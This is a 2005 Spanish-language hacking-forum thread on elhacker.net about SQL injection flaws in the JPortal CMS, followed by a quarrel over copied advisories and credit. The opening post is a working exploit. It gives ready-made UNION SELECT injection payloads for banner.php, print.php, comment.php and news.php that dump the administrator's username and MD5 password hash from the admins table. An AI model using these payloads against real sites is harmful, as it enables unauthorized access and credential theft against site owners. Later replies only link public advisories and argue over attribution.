elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 14:06  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  JPORTAL BUG
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: JPORTAL BUG  (Leído 4,415 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
JPORTAL BUG
« en: 3 Noviembre 2005, 22:18 »

1.-nos posicionamos en:

http://[victim]/jportal/banner.php

e intentamos esto:
Código:
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1

y tambien:
Código:
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1

despues de esto, obtenemos el user y el password del administrador.

2.-
Código:
print.php?what=article&id=<article id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201

3.-
Código:
http://[adres]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, nick, null, null, null, null, null, null,
null, null, null from admins limit n,1)
para obtener el nick del admin

Código:
http://[adres]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, pass, null, null, null, null, null, null,
null, null, null from admins limit n,1)
para obtener el MD5 password

4.-
Código:
print.php?what=article&id=<article id> AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1

Código:
news.php?id=<news id>%20AND%200%20=%201%20UNION%20SELECT%20*,%201,%201,%201,%201%20FROM%20admins%20--

Código:
print.php?what=article&id=<article id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: JPORTAL BUG
« Respuesta #1 en: 4 Noviembre 2005, 15:37 »

advisore publicado en:

http://www.security.nnov.ru/Kdocument105.html

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: JPORTAL BUG
« Respuesta #2 en: 5 Noviembre 2005, 15:16 »

mi tercer advisore publicado...

http://www.securityfocus.com/bid/15324

PD: dedicado al amigo ¨kasswed¨.Sin rencores!!! ;)

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Kasswed
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.199


Andalucía


Ver Perfil
Re: JPORTAL BUG
« Respuesta #3 en: 5 Noviembre 2005, 15:47 »

Mousehack, callate ya y deja de joder y hacer copy & paste. Y no me restriegues los bugs que sakes.

PD: Sin rencores.

Saludos!
« Última modificación: 5 Noviembre 2005, 15:52 por kasswed » En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: JPORTAL BUG
« Respuesta #4 en: 5 Noviembre 2005, 15:53 »

tu MP fue contestado... ;)

PD: si algun moderador y/o administrador considera que no debo seguir posteando me avisa y listo.

[ironia]Mousehack ¨el REy del copy&paste¨(en el foro de noticias)[/ironia]

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Kasswed
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.199


Andalucía


Ver Perfil
Re: JPORTAL BUG
« Respuesta #5 en: 5 Noviembre 2005, 15:56 »

Lo que hay que leer. Venga tio, sigue asi.

Saludos!

En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: JPORTAL BUG
« Respuesta #6 en: 5 Noviembre 2005, 16:00 »

solo por que tu me lo pides... ;)

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
whaky

Desconectado Desconectado

Mensajes: 151


Angel del Infierno


Ver Perfil
Re: JPORTAL BUG
« Respuesta #7 en: 5 Noviembre 2005, 16:03 »

http://marc.theaimsgroup.com/?l=bugtraq&m=111331738223323&w=2

Date:       2005-04-12 7:13:14


alli ya hablaron de ese fallo
En línea

Los muertos hablan y las paredes oyen
por si acaso nunca reveles tu identidad.
Kasswed
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.199


Andalucía


Ver Perfil
Re: JPORTAL BUG
« Respuesta #8 en: 5 Noviembre 2005, 16:07 »

Mousehack, venga, suerte con tu bug. Y deja ya de postear copias.

Saludos!
En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: JPORTAL BUG
« Respuesta #9 en: 5 Noviembre 2005, 16:09 »

jajajjaajajaja si tu lo dices... :)

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Kuantic0

Desconectado Desconectado

Mensajes: 30


Shotta ruleZ!!!!


Ver Perfil
Re: JPORTAL BUG
« Respuesta #10 en: 5 Noviembre 2005, 16:10 »

Parece k se te adelantaron
En línea



En paint por Kasswed

Kasswed
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.199


Andalucía


Ver Perfil
Re: JPORTAL BUG
« Respuesta #11 en: 5 Noviembre 2005, 16:12 »

http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2005-04/0154.html
http://marc.theaimsgroup.com/?l=bugtraq&m=112748957426316&w=2
http://www.governmentsecurity.org/archive/t14401.html
http://www.zone-h.org/advisories/read/id=8166

Saludos!
« Última modificación: 5 Noviembre 2005, 16:16 por kasswed » En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: JPORTAL BUG
« Respuesta #12 en: 5 Noviembre 2005, 16:18 »

ese bug se refiere al modulo ¨download.php¨ y a ¨banner.php¨.Por el resto pueden fijarse en el principio del post... ;) :)

http://www.frsirt.com/english/advisories/2005/2310

Salu2

PD:las ironias de la vida... :)
« Última modificación: 5 Noviembre 2005, 16:25 por mousehack » En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
SeniorX


Desconectado Desconectado

Mensajes: 1.347


Programador Novato


Ver Perfil WWW
Re: JPORTAL BUG
« Respuesta #13 en: 5 Noviembre 2005, 16:34 »

hey men no me cabe en la cabeza que pueda ser negativo que alguien entregue informacion de seguridad tan seguido como mousehack, si a alguien le molesta que sean copy paste, pues antes de abrir un post fijense si es mousehack, si es el, no lo abran y tema solucionado, aunque no le veo la parte negativa.

Mi postura es neutra pero me gusta entrar al foro y encontrar nuevas noticias, y cosas con respecto a la informatica, yo entro aca para aprender y enseñar lo que yo se, si leo algo que ya está en la red y solo fue copiado acá no encuentro la razon por la cual me deberia molestar ya que sigue cumpliendo con mi objetivo principal que es aprender, y segun yo deberia ser el objetivo principal de todos o no? De pasada te ries, y hasta te puede dar rabia, puedes bromear unas pocas veces pero principalmente se discuten temas actuales con el fin de aprender o me equivoco? Creo que mousehack ayuda a este fin. Mi intension no es defender a mousehack en pleno, pero si me interesa defender mi objetivo y a cualquiera que me ayude a cumplirlo.

Esa es mi humilde opinión amigos, no encuentro nada  de malo en leer un copy paste.
En línea

Código:
try {
     live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}
Precaución: La programacion puede producir adiccion
Kasswed
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.199


Andalucía


Ver Perfil
Re: JPORTAL BUG
« Respuesta #14 en: 5 Noviembre 2005, 16:38 »

Si a mi me la suda que sea copy & paste, pero que no se atribuya meritos cuando no son suyos. O a ti te gustaria (por poner un jemplo) que hicieras un manual y en otro foro te lo copiaran? Y k dijeran k el manual es del tio k lo puso en el foro??? Vaa, sabes k no, k el C & P esta muy bien, pero cuadno se pone la fuente...

Saludos!
« Última modificación: 5 Noviembre 2005, 16:41 por kasswed » En línea

"He who allows himself to be insulted, deserves to be."

Repórtame cualquier falta a las normas del foro por mensaje privado.
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines